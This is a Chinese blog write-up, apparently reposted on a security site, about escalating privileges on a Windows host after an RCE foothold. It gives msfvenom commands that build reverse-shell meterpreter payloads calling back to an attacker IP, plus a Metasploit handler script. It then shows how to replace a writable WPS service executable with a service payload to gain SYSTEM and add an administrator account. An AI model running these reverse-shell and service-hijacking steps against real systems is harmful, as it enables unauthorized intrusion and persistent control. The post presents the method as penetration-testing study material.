记一次简单的win提权

admin
admin
admin
138674
文章
114
评论
2020年9月7日16:54:01评论240 views字数 1927阅读6分25秒阅读模式
记一次简单的win提权

点击蓝字关注我们吧!


1、前言


在一次测试中,通过rce漏洞获得了目标主机meterpreter会话,尝试进行一些提权实验。

过程中两台机子都不通外网,本文记录一下获得会话并提权过程。

本文由“壹伴编辑器”提供技术支持



2、获取msf会话



生成一个exe载荷,看情况免杀:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.122.135 LPORT=443 -f exe -o 666.exe

在准备让目标机执行我们的载荷前,先使用脚本(通过msfpc来生成)来快速监听会话,
并进行一些自动进程迁移的工作:

msfconsole -q -r '/home/yanghao/windows-meterpreter-staged-reverse-tcp-443-exe.rc'

脚本内容如下:

use exploit/multi/handlerset PAYLOAD windows/meterpreter/reverse_tcpset LHOST 192.168.122.135set LPORT 443set ExitOnSession falseset EnableStageEncoding trueset EnableUnicodeEncoding trueset AutoRunScript 'post/windows/manage/migrate' run -j

参数的具体含义可以在设置了payload后执行show advanced查看: 

记一次简单的win提权

开始监听: 

记一次简单的win提权

在目标机上执行生成的exe,获取会话: 

记一次简单的win提权

本文由“壹伴编辑器”提供技术支持



3、尝试提权



看了下目标已经是管理员权限了,如果要抓密码的话,得拿到system,准备试试。
先ps看一下进程,发现有杀软,不过没关系,没有外网战力-50%: 

记一次简单的win提权
 
假装getsystem一下,whoami /priv 查看一下权限: 

记一次简单的win提权

记一次简单的win提权

localexploitsuggester 模块失败


试试自带的模块来检查提取漏洞:

use post/multi/recon/local_exploit_suggester

记一次简单的win提权
 
发现有了一些漏洞,然后就加载对应的利用模块来进行尝试: 

记一次简单的win提权

记一次简单的win提权

记一次简单的win提权


柳暗花明 (enum_services利用)


差不多模块都试了一下,因为有杀软的原因,都失败了。
这时候想着找点新的exp来用用,但是网络不太方便,就先看看主机上的情况,
先看了下主机上启动的服务情况:

use post/windows/gather/enum_services

记一次简单的win提权

发现了一个在D盘的服务
(wpscloudsvr LocalSystem "D:Program FilesWPS Officewpscloudsvr.exe" LocalService): 

记一次简单的win提权

这里我们知道, 在C盘Windows,Program Files等目录下的文件都会被系统权限保护,
而这个wpscloudsvr服务的可执行文件放在了D盘 (这也是个很正常的事,总不能啥软件都往C盘装吧)
如果软件开放过程中未对这种类似服务的文件进行权限限制同时可以对服务进行重启动,
那么就可以利用替换该服务文件的方法来获得权限提升。
接下来通过 cacls wpscloudsvr.exe 查看文件权限,发现权限设置不当,标准用户可以对其更改 (图找不到了,大概结果就像下面这样),
同时也可以直接使用net命令对服务进行启动和停止: 

记一次简单的win提权

现在条件都满足了,生成个马给这个文件替换了,重新启动服务不就完成提权了吗?
快速操作中...

1、使用msfvenom生成一个exe-service类型的载荷:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.122.135 LPORT=8522 -f exe-service -o wpscloudsvr.exe

记一次简单的win提权

 2、上传并启动服务,并获得了会话:

uplaod /xx/xx/wpscloudsvr.exe "D:\Program Files\WPS Office\wpscloudsvr.exe"shell>net start wpscloudsvr

记一次简单的win提权
 
这里就拿到了system权限的会话了: 

记一次简单的win提权

记一次简单的win提权
 
后面就是上远程桌面看看,加个管理员账户什么的: 

记一次简单的win提权

记一次简单的win提权

本文由“壹伴编辑器”提供技术支持



4、总结



  • 1、使用metasploit脚本进行自动化设置 

  • 2、metasploit本地提权漏洞扫描、利用,相关信息收集模块使用;

  • 3、服务可执行文件权限设置不当的cacls检查、exe-service载荷生成、替换执行提权。


本文由“壹伴编辑器”提供技术支持


5、参考


https://blog.csdn.net/l1028386804/article/details/86669614

end



记一次简单的win提权


免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年9月7日16:54:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次简单的win提权https://cn-sec.com/archives/121315.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息